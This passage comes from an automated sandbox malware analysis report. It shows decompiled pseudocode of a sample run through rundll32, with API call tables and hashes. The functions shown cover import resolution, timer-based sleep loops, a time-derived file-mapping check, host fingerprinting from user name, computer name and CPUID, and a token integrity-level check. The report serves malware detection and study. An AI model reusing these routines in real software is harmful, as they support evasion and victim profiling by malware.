				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x5470002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x547d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x547d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x547d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x547d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x547d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x547d198; // 0x0
										 *_t102 = _t125;
										 *0x547d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x547d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                  0x0547adf4
                                                  0x0547ae0a
                                                  0x0547ae10
                                                  0x0547ae12
                                                  0x0547ae17
                                                  0x0547ae1d
                                                  0x0547ae22
                                                  0x0547ae25
                                                  0x0547ae33
                                                  0x0547ae3a
                                                  0x0547ae3d
                                                  0x0547ae40
                                                  0x0547ae41
                                                  0x0547ae44
                                                  0x0547ae47
                                                  0x0547ae4a
                                                  0x0547ae4f
                                                  0x0547ae5e
                                                  0x00000000
                                                  0x0547ae64
                                                  0x0547ae6e
                                                  0x0547ae78
                                                  0x0547ae7d
                                                  0x0547ae7f
                                                  0x0547ae89
                                                  0x0547ae8c
                                                  0x0547ae8f
                                                  0x0547ae95
                                                  0x0547ae97
                                                  0x0547ae97
                                                  0x0547ae9a
                                                  0x0547ae9d
                                                  0x0547aea2
                                                  0x0547aea6
                                                  0x0547aeb9
                                                  0x0547aebb
                                                  0x0547af63
                                                  0x0547af63
                                                  0x0547af6a
                                                  0x0547af6d
                                                  0x0547af77
                                                  0x0547af77
                                                  0x0547af7b
                                                  0x0547aff9
                                                  0x0547affc
                                                  0x0547affe
                                                  0x0547affe
                                                  0x0547b005
                                                  0x0547b007
                                                  0x0547b011
                                                  0x0547b014
                                                  0x0547b017
                                                  0x0547b017
                                                  0x00000000
                                                  0x0547af7d
                                                  0x0547af80
                                                  0x0547afae
                                                  0x0547afb8
                                                  0x0547afbc
                                                  0x0547afc4
                                                  0x0547afc7
                                                  0x0547afce
                                                  0x0547afd8
                                                  0x0547afd8
                                                  0x0547afdc
                                                  0x0547afe1
                                                  0x0547aff0
                                                  0x0547aff6
                                                  0x0547aff6
                                                  0x0547afdc
                                                  0x00000000
                                                  0x0547af87
                                                  0x0547af8a
                                                  0x0547af92
                                                  0x0547afa7
                                                  0x0547afac
                                                  0x00000000
                                                  0x00000000
                                                  0x0547afac
                                                  0x00000000
                                                  0x0547af92
                                                  0x0547af80
                                                  0x0547af7b
                                                  0x0547aec1
                                                  0x0547aec8
                                                  0x0547aed8
                                                  0x0547aedb
                                                  0x0547aee1
                                                  0x0547aee5
                                                  0x0547af28
                                                  0x0547af34
                                                  0x0547af5d
                                                  0x0547af36
                                                  0x0547af3a
                                                  0x0547af40
                                                  0x0547af48
                                                  0x0547af4a
                                                  0x0547af4d
                                                  0x0547af53
                                                  0x0547af55
                                                  0x0547af55
                                                  0x0547af48
                                                  0x0547af3a
                                                  0x00000000
                                                  0x0547af34
                                                  0x0547aeed
                                                  0x0547aef0
                                                  0x0547aef7
                                                  0x0547af07
                                                  0x0547af0a
                                                  0x0547af1a
                                                  0x00000000
                                                  0x0547af20
                                                  0x0547af01
                                                  0x0547af05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547af05
                                                  0x0547aed2
                                                  0x0547aed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547aed6
                                                  0x0547aeaf
                                                  0x0547aeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0547AE5E
                                                  • LoadLibraryA.KERNELBASE(?), ref: 0547AEDB
                                                  • GetLastError.KERNEL32 ref: 0547AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0547AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: 49634c80816c2d1e4dc233813b5d31ed2436d25b41fc61f87047507ddcc9fdc4
                                                  • Instruction ID: 2dbfc97c07a5c142d0cc8178042d3beb56b2069f4cccb6ae45f553b665337d31
                                                  • Opcode Fuzzy Hash: 49634c80816c2d1e4dc233813b5d31ed2436d25b41fc61f87047507ddcc9fdc4
                                                  • Instruction Fuzzy Hash: B88106B1A10209AFDB24CFA9D885AEEBBB5FB48210F14816AF515E7344EB70E945CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05476786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 83%
                                                  			E05476786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x547d240);
					_v20 = 0;
					_v16 = 0;
					L0547B0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x547d26c; // 0x31c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x547d24c = 5;
						} else {
							_t68 = E054773FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x547d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E05478504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E05473BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x547d244);
							goto L21;
						} else {
							__eflags =  *0x547d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E0547A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x547d248);
								L21:
								L0547B0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x547d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                  0x05476786
                                                  0x05476798
                                                  0x0547679b
                                                  0x054767a7
                                                  0x054767af
                                                  0x054767b2
                                                  0x05476919
                                                  0x054767b8
                                                  0x054767b8
                                                  0x054767ba
                                                  0x054767bf
                                                  0x054767c0
                                                  0x054767c6
                                                  0x054767c9
                                                  0x054767cc
                                                  0x054767da
                                                  0x054767e5
                                                  0x054767e8
                                                  0x054767ea
                                                  0x054767f7
                                                  0x05476801
                                                  0x05476805
                                                  0x05476808
                                                  0x0547680d
                                                  0x05476818
                                                  0x05476818
                                                  0x0547680f
                                                  0x0547680f
                                                  0x05476816
                                                  0x00000000
                                                  0x00000000
                                                  0x05476816
                                                  0x05476822
                                                  0x00000000
                                                  0x05476825
                                                  0x05476829
                                                  0x05476834
                                                  0x05476834
                                                  0x0547683b
                                                  0x05476844
                                                  0x0547684b
                                                  0x05476854
                                                  0x05476857
                                                  0x0547685a
                                                  0x05476861
                                                  0x05476864
                                                  0x00000000
                                                  0x00000000
                                                  0x05476866
                                                  0x05476869
                                                  0x0547686c
                                                  0x0547686f
                                                  0x00000000
                                                  0x05476871
                                                  0x05476880
                                                  0x05476880
                                                  0x00000000
                                                  0x054768ae
                                                  0x054768ae
                                                  0x054768b3
                                                  0x054768d2
                                                  0x054768d4
                                                  0x054768d9
                                                  0x054768da
                                                  0x00000000
                                                  0x054768b5
                                                  0x054768b5
                                                  0x054768bb
                                                  0x00000000
                                                  0x054768bd
                                                  0x054768bd
                                                  0x054768c2
                                                  0x054768c4
                                                  0x054768c9
                                                  0x054768ca
                                                  0x054768e0
                                                  0x054768e0
                                                  0x054768e8
                                                  0x054768f3
                                                  0x054768f6
                                                  0x05476901
                                                  0x05476903
                                                  0x05476905
                                                  0x05476908
                                                  0x00000000
                                                  0x0547690e
                                                  0x00000000
                                                  0x0547690e
                                                  0x05476908
                                                  0x054768bb
                                                  0x00000000
                                                  0x054768b3
                                                  0x05476883
                                                  0x05476885
                                                  0x05476888
                                                  0x05476889
                                                  0x05476889
                                                  0x0547688d
                                                  0x05476897
                                                  0x05476897
                                                  0x0547689d
                                                  0x054768a0
                                                  0x054768a0
                                                  0x054768a6
                                                  0x054768a6
                                                  0x05476923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 0547679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 054767A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 054767CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 054767E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05476801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 05476897
                                                  • CloseHandle.KERNEL32(?), ref: 054768A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 054768E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,05472417,?), ref: 054768F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05476901
                                                    • Part of subcall function 054773FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073E93C0,?,00000000,30314549,00000014,004F0053,073E937C), ref: 054774E9
                                                    • Part of subcall function 054773FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,05476814), ref: 054774FB
                                                  • GetLastError.KERNEL32 ref: 05476913
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 3e024c75f916abb4422161b8809114d4310cb557449f4bfb03200555dfb12ddb
                                                  • Instruction ID: 3a9a52b58736032b771af979cdd46151052557937acfe55fd81a0c80fb047a7a
                                                  • Opcode Fuzzy Hash: 3e024c75f916abb4422161b8809114d4310cb557449f4bfb03200555dfb12ddb
                                                  • Instruction Fuzzy Hash: 7D516C7181122DAACF14DFD5DC49DEEBFBAFF49320F21425AF411A2280DB709A45CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05471B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E05471B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0547B0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x547d27c; // 0x1f6a5a8
				_t5 = _t13 + 0x547e862; // 0x73e8e0a
				_t6 = _t13 + 0x547e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0547AD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x547d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                  0x05471b2f
                                                  0x05471b37
                                                  0x05471b3b
                                                  0x05471b41
                                                  0x05471b46
                                                  0x05471b4b
                                                  0x05471b4e
                                                  0x05471b51
                                                  0x05471b56
                                                  0x05471b57
                                                  0x05471b5a
                                                  0x05471b5f
                                                  0x05471b66
                                                  0x05471b70
                                                  0x05471b72
                                                  0x05471b73
                                                  0x05471b76
                                                  0x05471b92
                                                  0x05471b98
                                                  0x05471b9c
                                                  0x05471bea
                                                  0x05471b9e
                                                  0x05471bab
                                                  0x05471bbb
                                                  0x05471bc3
                                                  0x05471bd5
                                                  0x05471bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x05471bc5
                                                  0x05471bc8
                                                  0x05471bcd
                                                  0x05471bcf
                                                  0x05471bcf
                                                  0x05471bad
                                                  0x05471baf
                                                  0x05471bdb
                                                  0x05471bdc
                                                  0x05471bdc
                                                  0x05471bab
                                                  0x05471bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,054722EA,?,?,4D283A53,?,?), ref: 05471B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 05471B51
                                                  • _snwprintf.NTDLL ref: 05471B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,0547D2A8,00000004,00000000,00001000,?), ref: 05471B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,054722EA,?,?,4D283A53), ref: 05471BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 05471BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,054722EA,?,?), ref: 05471BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,054722EA,?,?,4D283A53), ref: 05471BE4
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 2c0c3666935b33399f0e98fbe9e27a23b5130ac32ea0fefadd31b1092938e3a8
                                                  • Instruction ID: a5d7f4b9b0b0ddc527437a065d7f543816305a0b9299093fffb14589bbcdbb28
                                                  • Opcode Fuzzy Hash: 2c0c3666935b33399f0e98fbe9e27a23b5130ac32ea0fefadd31b1092938e3a8
                                                  • Instruction Fuzzy Hash: 1E21C37660020CBBC725DBA4CC4AFCA7BA9AF84750F210166F605EB290EA709A05CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 123 547269c-54726b0 124 54726b2-54726b7 123->124 125 54726ba-54726cc call 5476b43 123->125 124->125 128 5472720-547272d 125->128 129 54726ce-54726de GetUserNameW 125->129 131 547272f-5472746 GetComputerNameW 128->131 130 54726e0-54726f0 RtlAllocateHeap 129->130 129->131 130->131 132 54726f2-54726ff GetUserNameW 130->132 133 5472784-54727a6 131->133 134 5472748-5472759 RtlAllocateHeap 131->134 135 5472701-547270d call 5472496 132->135 136 547270f-547271e HeapFree 132->136 134->133 137 547275b-5472764 GetComputerNameW 134->137 135->136 136->131 139 5472766-5472772 call 5472496 137->139 140 5472775-547277e HeapFree 137->140 139->140 140->133
                                                  C-Code - Quality: 96%
                                                  			E0547269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x547d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E05476B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x547d278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x547d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E05472496(_v8 + _v8, _t63);
							}
							HeapFree( *0x547d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x547d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E05472496(_v8 + _v8, _t63);
						}
						HeapFree( *0x547d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                  0x0547269c
                                                  0x054726a4
                                                  0x054726aa
                                                  0x054726ad
                                                  0x054726b0
                                                  0x054726b2
                                                  0x054726b7
                                                  0x054726b7
                                                  0x054726bd
                                                  0x054726bf
                                                  0x054726cc
                                                  0x0547272d
                                                  0x054726ce
                                                  0x054726d3
                                                  0x054726d9
                                                  0x054726de
                                                  0x054726ec
                                                  0x054726f0
                                                  0x054726ff
                                                  0x05472706
                                                  0x0547270d
                                                  0x0547270d
                                                  0x05472718
                                                  0x05472718
                                                  0x054726f0
                                                  0x054726de
                                                  0x0547272f
                                                  0x05472735
                                                  0x0547273f
                                                  0x05472741
                                                  0x05472746
                                                  0x05472755
                                                  0x05472759
                                                  0x05472764
                                                  0x0547276b
                                                  0x05472772
                                                  0x05472772
                                                  0x0547277e
                                                  0x0547277e
                                                  0x05472759
                                                  0x05472787
                                                  0x05472789
                                                  0x0547278c
                                                  0x0547278e
                                                  0x05472791
                                                  0x05472794
                                                  0x0547279e
                                                  0x054727a2
                                                  0x054727a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 054726D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 054726EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 054726F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,054723D9), ref: 05472718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0547273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05472753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 05472760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,054723D9), ref: 0547277E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 7beb2c21b51f32d7c302d3c1e66ecdd6557636dc98d26656b06ad907549caf2f
                                                  • Instruction ID: 0bad08970ff994255909caf8cc95b0a0be641bbcbfb1d376d8838bb619e2f682
                                                  • Opcode Fuzzy Hash: 7beb2c21b51f32d7c302d3c1e66ecdd6557636dc98d26656b06ad907549caf2f
                                                  • Instruction Fuzzy Hash: 4F314875A24209EFDB15DFA9C981AEEBBF9FF48200B2040AAE405D7210DB70EA418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E0547924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x547d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E05472049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E05479039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                  0x0547925c
                                                  0x05479263
                                                  0x0547926a
                                                  0x0547927e
                                                  0x05479289
                                                  0x054792a1
                                                  0x054792ae
                                                  0x054792b1
                                                  0x054792b6
                                                  0x054792c1
                                                  0x054792c5
                                                  0x054792d4
                                                  0x054792d8
                                                  0x054792f4
                                                  0x054792f4
                                                  0x054792f8
                                                  0x054792f8
                                                  0x054792fd
                                                  0x05479301
                                                  0x05479307
                                                  0x05479308
                                                  0x0547930f
                                                  0x05479315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 05479281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 054792A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 054792B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 05479301
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 054792D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 054792DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 054792EC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 4fae33db728c164cd2c833355c6489f5262a9cd879a5a6e2f00a865f06d1a7c2
                                                  • Instruction ID: 76b77edf473bda379e1780f1c7f027b234410388b232cbf9990572c95c20233b
                                                  • Opcode Fuzzy Hash: 4fae33db728c164cd2c833355c6489f5262a9cd879a5a6e2f00a865f06d1a7c2
                                                  • Instruction Fuzzy Hash: 4D21197591425DFFEB019F95DC85DEEBF7AEF48304F1000A6F911A6290CB719A05EB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05476A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
